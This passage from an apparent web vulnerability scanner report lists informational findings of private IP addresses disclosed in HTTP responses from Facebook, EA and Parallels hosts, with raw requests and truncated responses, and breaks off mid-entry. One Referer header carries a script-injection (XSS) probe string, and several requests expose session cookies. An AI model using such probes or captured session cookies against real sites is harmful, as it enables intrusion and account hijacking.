23.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/63583.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download1.parallels.com
Path:   /PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/63583.htm

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/63583.htm HTTP/1.1
Host: download1.parallels.com
Proxy-Connection: keep-alive
Referer: http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/index.htm?fileName=63583.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=d7aaa062b220f34045ee842b61dd35f8; __utmz=1.1306243398.5.3.utmcsr=webmail.nosedivesailing.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/portal/sidebar.php; __utma=1.1253792871.1305655713.1306182369.1306243398.5; s_vnum=1337191716908%26vn%3D5

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1200
Content-Type: text/html; charset=UTF-8
Date: Fri, 24 Jun 2011 14:51:32 GMT
ETag: "baac40a-1150-83855b00"
Expires: Fri, 24 Jun 2011 15:11:32 GMT
Last-Modified: Fri, 04 Dec 2009 06:49:48 GMT
Server: ECAcc (dca/5350)
X-Cache: HIT
Content-Length: 4432

<html>
<head>
<title> Becoming Familiar with Parallels Small Business Panel </title>
<meta name="Keywords" content="" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<lin
...[SNIP]...
<p class="listcontinue">For example: https://192.168.10.10:8443 or https://example.com:8443.</p>
...[SNIP]...
23.6. http://static.ak.fbcdn.net/connect.php/css/share-button-css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/css/share-button-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/css/share-button-css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ea.com/

Response

HTTP/1.1 200 OK
ETag: "ee992e76ddeef4e2c619068f79da7e8b"
Vary: Accept-Encoding
X-FB-Server: 10.54.94.35
X-Cnection: close
Content-Type: text/css; charset=utf-8
Content-Length: 5414
Cache-Control: public, max-age=249
Expires: Fri, 24 Jun 2011 14:31:29 GMT
Date: Fri, 24 Jun 2011 14:27:20 GMT
Connection: close

/*1303254860,171381284,JIT Construction: v368160,en_US*/

.FBConnectButton_Simple,
.FBConnectButton_RTL_Simple{background-image:url(/images/connect_favicon.png);background-repeat:no-repeat;outline:non
...[SNIP]...
23.7. http://static.ak.fbcdn.net/connect.php/js/FB.Share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect.php/js/FB.Share

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/js/FB.Share HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ea.com/

Response

HTTP/1.1 200 OK
ETag: "1bea4d5f2613844ac10f2da88a3fb8c2"
Vary: Accept-Encoding
Content-Type: application/x-javascript; charset=utf-8
X-FB-Server: 10.62.75.49
X-Cnection: close
Content-Length: 6584
Cache-Control: public, max-age=252
Expires: Fri, 24 Jun 2011 14:31:28 GMT
Date: Fri, 24 Jun 2011 14:27:16 GMT
Connection: close

/*1308784165,171854641,JIT Construction: v396123,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
23.8. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/xd_proxy.php?version=3 HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b01ba%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fphuket.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.30.148.189
X-Cnection: close
Content-Length: 2338
Vary: Accept-Encoding
Cache-Control: public, max-age=1198
Expires: Fri, 24 Jun 2011 13:40:38 GMT
Date: Fri, 24 Jun 2011 13:20:40 GMT
Connection: close

<!doctype html>
<html>
<head>
<title>XD Proxy</title>
</head>
<body onload="doFragmentSend()">
<div
id="swf_holder"
style="position: absolute; top: -10000px; width: 1px; heig
...[SNIP]...
23.9. http://static.ak.fbcdn.net/images/connect_sprite.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /images/connect_sprite.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/connect_sprite.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/connect.php/css/share-button-css

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/png
X-FB-Server: 10.30.148.193
X-Cnection: close
Content-Length: 1916
Cache-Control: max-age=871205
Expires: Mon, 04 Jul 2011 16:27:27 GMT
Date: Fri, 24 Jun 2011 14:27:22 GMT
Connection: close

.PNG
.
...IHDR...'.........b_Ci....PLTE...Oj.r..y..z...5nEa.z.....{..|........ay.......F_...................{..m........D^....@Z.B[....E^.C].......@Z.p..Le....p...........C].B\.............A[.......
...[SNIP]...
23.10. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/ulcvK428paE.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/y9/r/ulcvK428paE.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/y9/r/ulcvK428paE.js HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?api_key=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df162b01ba%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fphuket.com%2F&layout=standard&locale=en_GB&node_type=link&sdk=joey&show_faces=true&width=450
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 23 Jun 2011 21:06:58 GMT
X-FB-Server: 10.30.145.196
X-Cnection: close
Content-Length: 143341
Vary: Accept-Encoding
Cache-Control: public, max-age=31485561
Expires: Fri, 22 Jun 2012 23:20:00 GMT
Date: Fri, 24 Jun 2011 13:20:39 GMT
Connection: close

/*1308871178,169775556*/

if (window.CavalryLogger) { CavalryLogger.start_js(["QUMjE"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string|
...[SNIP]...
23.11. http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/OqB3HmdoAE3.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yo/r/OqB3HmdoAE3.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yo/r/OqB3HmdoAE3.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 20 Jun 2011 02:29:33 GMT
X-FB-Server: 10.30.146.197
X-Cnection: close
Content-Length: 6987
Vary: Accept-Encoding
Cache-Control: public, max-age=31153460
Expires: Tue, 19 Jun 2012 03:02:56 GMT
Date: Fri, 24 Jun 2011 13:18:36 GMT
Connection: close

/*1308539015,169775813*/

table.component_table{padding-left:5px;padding-top:5px}
table.component_table td.icons{width:20px;text-align:center;vertical-align:middle}
table.component_table td.content{wh
...[SNIP]...
23.12. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zX/r/i_oIVTKMYsL.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zX/r/i_oIVTKMYsL.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/connect.php/css/share-button-css

Response

HTTP/1.1 200 OK
Content-Length: 92
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 08:00:35 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.69.184
Cache-Control: public, max-age=22811638
Expires: Wed, 14 Mar 2012 15:01:24 GMT
Date: Fri, 24 Jun 2011 14:27:26 GMT
Connection: close

.PNG
.
...IHDR..............o&....#IDAT.[c...v.....].....A..\.Y.,..@....\.-.    .....IEND.B`.
23.13. http://web-static.ea.com/us/portal/js/ea/Framework.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/js/ea/Framework.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /us/portal/js/ea/Framework.js?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://web-static.ea.com/us/portal/js/jquery/160c2%22%3E%3Cscript%3Ealert(1)%3C/script%3E31a872bdf89?ver=379_en_US

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 04 Nov 2010 23:53:05 GMT
ETag: "283ca2-6fcb-49442dbe7da40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 28619
Content-Type: application/javascript
Cache-Control: max-age=43200
Expires: Sat, 25 Jun 2011 02:09:13 GMT
Date: Fri, 24 Jun 2011 14:09:13 GMT
Connection: close

/**
* Framework contains the basic functionality needed for EA.com
* It should be used for helper methods and for instantiation of global objects
* across the site, such as Flash embedding, main
...[SNIP]...
wser
   $('a.new-window').click(function(){
       //window.open(this.href);
       //return false;
   });
   
   //EP if config exists
   if (typeof EP_config=="object") {
       this.embedSWF({
           minFlashVersion: '10.0.0.0',
           swf: EP_config.swf,
           container: 'editorialPodContainer',
           width: EP_config.width,
           height: EP_config.height,
           flashvars: EP_config.flashvars,
           params: EP_config.params,
           attri
...[SNIP]...
23.14. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=0&app_id=0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3bd8c0104%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff23d5f824c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd6f27b88%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff23d5f824c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8fb3b728%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df332a1789c%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff23d5f824c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8fb3b728&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df214af005%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff23d5f824c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8fb3b728&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df10855b75%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff23d5f824c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8fb3b728&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/nightlife/fantasea.htm?pid=AWDINP1356
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.213.47
X-Cnection: close
Date: Fri, 24 Jun 2011 13:22:36 GMT
Content-Length: 22

Invalid application ID
23.15. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=155079171186702&app_id=155079171186702&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df143a1bc3%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df12abf4cdc%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d7959e18%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df25479d134%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bfa62428%26origin%3Dhttp%253A%252F%252Fphuket.com%252Ff200239f1%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df12b30ed1c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://phuket.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.9.59
X-Cnection: close
Date: Fri, 24 Jun 2011 13:20:38 GMT
Content-Length: 60

Given URL is not permitted by the application configuration.
23.16. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=0&app_id=0&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2dce18258%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff15fea7f08%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_GB&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df63bf65d8%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff15fea7f08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cf9b28c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2683e2d38%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff15fea7f08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cf9b28c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b50e236%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff15fea7f08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cf9b28c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df5d8ba2bc%26origin%3Dhttp%253A%252F%252Fwww.phuket-travel.com%252Ff15fea7f08%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5cf9b28c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.phuket-travel.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.213.35
X-Cnection: close
Date: Fri, 24 Jun 2011 13:22:22 GMT
Content-Length: 22

Invalid application ID
23.17. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=145271168848189&app_id=145271168848189&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39b58ce3%26origin%3Dhttp%253A%252F%252Fwww.gamersdailynews.com%252Ff68924778%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16844b198%26origin%3Dhttp%253A%252F%252Fwww.gamersdailynews.com%252Ff68924778%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20078724c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1ec37057c%26origin%3Dhttp%253A%252F%252Fwww.gamersdailynews.com%252Ff68924778%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20078724c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df426a97d8%26origin%3Dhttp%253A%252F%252Fwww.gamersdailynews.com%252Ff68924778%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20078724c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2d251488%26origin%3Dhttp%253A%252F%252Fwww.gamersdailynews.com%252Ff68924778%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df20078724c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en_US; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; lsd=Jr-eQ; datr=3GHNTeTln1shCRlV4nyEfKsc; reg_ext_ref=http%3A%2F%2Fwww.addthis.com%2Fbookmark.php%3Fv%3D250%26winname%3Daddthis%26pub%3Dasepyanm%26source%3Dtbx-250%2Cmen-250%26lng%3Den%26s%3Dfacebook%26url%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Fproduk-layanan%252F%26title%3DProduk%2520dan%2520Layanan%26ate%3DAT-asepyanm%2F-%2F-%2F4e048e8a01452adb%2F4%2F4dce8a530508b02d%26frommenu%3D1%26uid%3D4dce8a530508b02d%26ct%3D1%26pre%3Dhttp%253A%252F%252Fbeta.telkom.co.id%252Finfo-perusahaan%252F%26tt%3D0; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Flogin.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Flogin.php; wd=1057x822

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.185.54
X-Cnection: close
Date: Fri, 24 Jun 2011 13:26:55 GMT
Content-Length: 256

<script type="text/javascript">
parent.postMessage("cb=f426a97d8&origin=http\u00253A\u00252F\u00252Fwww.gamersdailynews.com\u00252Ff68924778&relation=parent&transport=postmessage&frame=f20078724c", "h
...[SNIP]...
23.18. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

